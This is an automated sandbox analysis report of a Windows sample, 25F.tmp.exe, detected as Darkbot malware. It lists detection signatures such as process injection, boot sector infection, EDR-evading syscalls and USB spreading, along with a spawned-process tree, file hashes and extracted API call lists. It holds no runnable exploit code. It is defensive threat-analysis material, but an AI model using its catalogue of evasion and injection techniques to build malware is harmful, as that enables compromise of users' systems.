Windows Analysis Report
25F.tmp.exe

Overview

General Information

Sample name:25F.tmp.exe
Analysis ID:1582673
MD5:348ad3e983cccbab62c3648f0bcb0f88
SHA1:ba39729ea26b32aee01b4dc57e89f7a909bda3b2
SHA256:9d8445fe53e5494a49bc714ef07ce39b41ad71ea7de73699f0b28bef16bb9da8
Infos:

Detection

Darkbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Yara detected Darkbot
AI detected suspicious sample
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Contains functionality to access PhysicalDrive, possible boot sector overwrite
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after checking system information)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Changes the start page of internet explorer
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w7x64
  • 25F.tmp.exe (PID: 3252 cmdline: "C:\Users\user\Desktop\25F.tmp.exe" MD5: 348AD3E983CCCBAB62C3648F0BCB0F88)
    • 25F.tmp.exe (PID: 3356 cmdline: C:\Users\user\Desktop\25F.tmp.exe MD5: 348AD3E983CCCBAB62C3648F0BCB0F88)
      • notepad.exe (PID: 3372 cmdline: "C:\Windows\notepad.exe" MD5: B32189BDFF6E577A92BAA61AD49264E6)
      • 25F.tmp.exe (PID: 3380 cmdline: C:\Users\user\Desktop\25F.tmp.exe MD5: 348AD3E983CCCBAB62C3648F0BCB0F88)
        • iexplore.exe (PID: 3396 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 8A590F790A98F3D77399BE457E01386A)
          • iexplore.exe (PID: 3408 cmdline: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" MD5: 4EB098135821348270F27157F7A84E65)
            • iexplore.exe (PID: 3700 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3408 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
        • WmiPrvSE.exe (PID: 652 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 54B7C43C2E89F5CE71B2C255C1CF35E2)
        • QgGhoOpxHPl.exe (PID: 2384 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1440 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2096 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1804 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 892 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1968 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 172 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 492 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1784 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1396 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 816 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1012 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1668 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2836 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1756 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2672 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2708 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2704 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2868 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 3068 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2684 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2688 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1436 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1452 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1060 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2248 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1448 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2228 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1260 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1852 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 724 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 772 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: 25F.tmp.exe PID: 3356 | JoeSecurity_Darkbot | Yara detected Darkbot | Joe Security |
Process Memory Space: 25F.tmp.exe PID: 3380 | JoeSecurity_Darkbot | Yara detected Darkbot | Joe Security |
Process Memory Space: WmiPrvSE.exe PID: 652 | JoeSecurity_Darkbot | Yara detected Darkbot | Joe Security |
Process Memory Space: QgGhoOpxHPl.exe PID: 2384 | JoeSecurity_Darkbot | Yara detected Darkbot | Joe Security |
Process Memory Space: QgGhoOpxHPl.exe PID: 1440 | JoeSecurity_Darkbot | Yara detected Darkbot | Joe Security |

System Summary

            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Internet Explorer\iexplore.exe, ProcessId: 3408, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
No Suricata rule has matched


AV Detection

Source: 25F.tmp.exe | Avira: detected
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 87.9% probability
Source: 25F.tmp.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\25F.tmp.exe
  Code function: 4_2_00361EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 4_2_00368C90 memset,WSAGetLastError,DecryptMessage
  Code function: 4_2_00368B30 memset,EncryptMessage
  Code function: 4_2_00408C90 memset,WSAGetLastError,DecryptMessage
  Code function: 4_2_00401EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 4_2_00408B30 memset,EncryptMessage
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
  Code function: 9_2_003D1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 9_2_003D8C90 memset,WSAGetLastError,DecryptMessage
  Code function: 9_2_003D8B30 memset,EncryptMessage
  Code function: 10_2_00188C90 memset,WSAGetLastError,DecryptMessage
  Code function: 10_2_00181EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 10_2_00188B30 memset,EncryptMessage
  Code function: 11_2_00381EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 11_2_00388C90 memset,WSAGetLastError,DecryptMessage
  Code function: 11_2_00388B30 memset,EncryptMessage
  Code function: 12_2_00418C90 memset,WSAGetLastError,DecryptMessage
  Code function: 12_2_00411EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 12_2_00418B30 memset,EncryptMessage
  Code function: 13_2_001B8C90 memset,WSAGetLastError,DecryptMessage
  Code function: 13_2_001B1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 13_2_001B8B30 memset,EncryptMessage
  Code function: 14_2_00351EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 14_2_00358C90 memset,WSAGetLastError,DecryptMessage
  Code function: 14_2_00358B30 memset,EncryptMessage
  Code function: 15_2_00311EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 15_2_00318C90 memset,WSAGetLastError,DecryptMessage
  Code function: 15_2_00318B30 memset,EncryptMessage
  Code function: 16_2_00381EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 16_2_00388C90 memset,WSAGetLastError,DecryptMessage
  Code function: 16_2_00388B30 memset,EncryptMessage
  Code function: 17_2_00108C90 memset,WSAGetLastError,DecryptMessage
  Code function: 17_2_00101EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 17_2_00108B30 memset,EncryptMessage
  Code function: 18_2_00108C90 memset,WSAGetLastError,DecryptMessage
  Code function: 18_2_00101EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 18_2_00108B30 memset,EncryptMessage
  Code function: 19_2_00221EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 19_2_00228C90 memset,WSAGetLastError,DecryptMessage
  Code function: 19_2_00228B30 memset,EncryptMessage
  Code function: 20_2_00321EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 20_2_00328C90 memset,WSAGetLastError,DecryptMessage
  Code function: 20_2_00328B30 memset,EncryptMessage
  Code function: 21_2_00518C90 memset,WSAGetLastError,DecryptMessage
  Code function: 21_2_00511EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 21_2_00518B30 memset,EncryptMessage
  Code function: 22_2_00198C90 memset,WSAGetLastError,DecryptMessage
  Code function: 22_2_00191EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 22_2_00198B30 memset,EncryptMessage
  Code function: 23_2_00848C90 memset,WSAGetLastError,DecryptMessage
  Code function: 23_2_00841EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 23_2_00848B30 memset,EncryptMessage
  Code function: 25_2_00408C90 memset,WSAGetLastError,DecryptMessage
  Code function: 25_2_00401EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 25_2_00408B30 memset,EncryptMessage
  Code function: 26_2_00828C90 memset,WSAGetLastError,DecryptMessage
  Code function: 26_2_00821EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 26_2_00828B30 memset,EncryptMessage
  Code function: 27_2_00098C90 memset,WSAGetLastError,DecryptMessage
  Code function: 27_2_00091EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 27_2_00098B30 memset,EncryptMessage
  Code function: 29_2_005D8C90 memset,WSAGetLastError,DecryptMessage
  Code function: 29_2_005D1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 29_2_005D8B30 memset,EncryptMessage
  Code function: 30_2_00098C90 memset,WSAGetLastError,DecryptMessage
  Code function: 30_2_00091EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 30_2_00098B30 memset,EncryptMessage
  Code function: 31_2_00918C90 memset,WSAGetLastError,DecryptMessage
  Code function: 31_2_00911EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 31_2_00918B30 memset,EncryptMessage
  Code function: 32_2_00391EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 32_2_00398C90 memset,WSAGetLastError,DecryptMessage
  Code function: 32_2_00398B30 memset,EncryptMessage
  Code function: 33_2_00098C90 memset,WSAGetLastError,DecryptMessage
  Code function: 33_2_00091EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
  Code function: 33_2_00098B30 memset,EncryptMessage
  Code function: 34_2_00221EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_00228C90 memset,WSAGetLastError,DecryptMessage,34_2_00228C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_00228B30 memset,EncryptMessage,34_2_00228B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_00158C90 memset,WSAGetLastError,DecryptMessage,35_2_00158C90
